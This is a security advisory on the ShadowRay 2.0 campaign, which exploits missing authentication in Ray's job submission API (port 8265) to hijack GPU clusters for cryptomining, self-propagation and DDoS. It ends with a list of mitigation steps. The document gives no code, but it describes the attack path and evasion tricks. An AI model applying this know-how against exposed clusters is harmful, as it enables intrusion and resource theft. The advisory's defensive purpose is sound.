ShadowRay 2.0 is a sophisticated exploitation campaign targeting a critical unauthenticated remote code execution vulnerability (CVE-2023-48022, CVSS 9.8) in the Ray open-source AI framework, which is widely used for distributed computing and AI workloads, often leveraging NVIDIA GPUs. The flaw stems from a missing authentication mechanism in the Ray Job Submission API (/api/jobs/), allowing attackers to submit arbitrary jobs remotely without credentials. This vulnerability has remained unpatched due to a design philosophy that Ray should only be deployed in isolated, trusted network environments. However, many deployments expose Ray dashboards publicly, creating a large attack surface with over 230,500 publicly accessible Ray servers identified. The ShadowRay 2.0 campaign, active since at least September 2024 and evolving from earlier waves, exploits this flaw to hijack GPU clusters for illicit cryptocurrency mining using the XMRig miner. The attackers submit malicious jobs that execute reconnaissance, multi-stage Bash and Python payloads, and establish persistence through cron jobs that regularly update the malware from attacker-controlled GitLab repositories. The malware also spreads laterally by scanning for other exposed Ray dashboards and submitting malicious jobs to them, effectively creating a worm that self-propagates across vulnerable clusters globally. The campaign uses GitHub and GitLab repositories to host payloads, with attackers quickly recreating accounts after takedowns, demonstrating operational resilience. The malware includes region-specific payloads, notably serving a different variant for victims in China, and actively terminates competing cryptominers to maximize resource usage. To evade detection, malicious processes masquerade as legitimate Linux kernel workers and throttle CPU usage to about 60%. Beyond cryptojacking, compromised clusters are weaponized for denial-of-service attacks using tools like sockstress, targeting mining pool infrastructure and possibly rented out for DDoS services. The campaign leverages Ray's legitimate orchestration features for lateral movement and persistence, turning a trusted AI framework into a multi-purpose botnet. Mitigation is complicated by the lack of a patch and the design assumptions of Ray, but network isolation, firewall restrictions, and adding authentication to the Ray dashboard port (8265) are critical. Anyscale, the original Ray developer, has released tools to detect exposed ports and misconfigurations to help prevent accidental exposure. The campaign's use of large language models to craft payloads and its persistence highlight the increasing sophistication of modern cryptojacking operations.

For European organizations, the ShadowRay 2.0 threat poses significant risks, especially for those deploying Ray clusters with NVIDIA GPUs in cloud or on-premises environments without strict network isolation. The unauthorized control of GPU resources leads to substantial financial losses due to wasted electricity and hardware wear from illicit cryptomining. The lateral spread capability increases the likelihood of widespread compromise within organizations or service providers hosting multiple Ray clusters. The use of compromised clusters for DDoS attacks adds reputational damage and potential collateral damage to critical infrastructure or business partners. Organizations relying on Ray for AI workloads may face operational disruptions, data confidentiality risks from reverse shells, and increased incident response costs. The stealthy nature of the malware, including process masquerading and CPU throttling, complicates detection and remediation efforts. The persistence mechanisms and rapid attacker adaptation to takedowns suggest prolonged exposure and risk if mitigations are not promptly applied. Additionally, the campaign’s regional payload differentiation and active removal of competing miners indicate a targeted and financially motivated adversary, increasing the threat’s sophistication. European cloud providers, research institutions, and enterprises using AI frameworks are particularly vulnerable if they expose Ray dashboards to the internet or fail to implement strict access controls.

1. Immediately audit all Ray cluster deployments to identify any instances with publicly accessible dashboards, especially on the default port 8265. 2. Implement strict network segmentation and firewall rules to restrict access to Ray dashboards and APIs only to trusted internal networks or VPNs. 3. Deploy authentication and authorization layers on top of the Ray dashboard and job submission APIs, as the framework lacks built-in authentication by design. 4. Utilize the 'Ray Open Ports Checker' tool provided by Anyscale to detect misconfigurations and exposed ports. 5. Monitor for unusual process activity on GPU clusters, including disguised Linux kernel worker processes and abnormal CPU usage patterns around 60%. 6. Scan for and remove unauthorized cron jobs or scheduled tasks that pull external payloads regularly. 7. Employ endpoint detection and response (EDR) solutions capable of detecting lateral movement, reverse shells, and cryptomining activity. 8. Block known malicious IP addresses and domains associated with GitHub and GitLab repositories used for payload delivery. 9. Educate DevOps and AI teams on the risks of exposing Ray dashboards publicly and enforce deployment best practices requiring isolated network environments. 10. Establish incident response plans specifically addressing cryptojacking and botnet infections leveraging AI frameworks. 11. Regularly update and patch all related infrastructure components, and monitor threat intelligence feeds for new developments or patches related to Ray. 12. Consider deploying honeypots mimicking Ray dashboards to detect scanning and exploitation attempts early.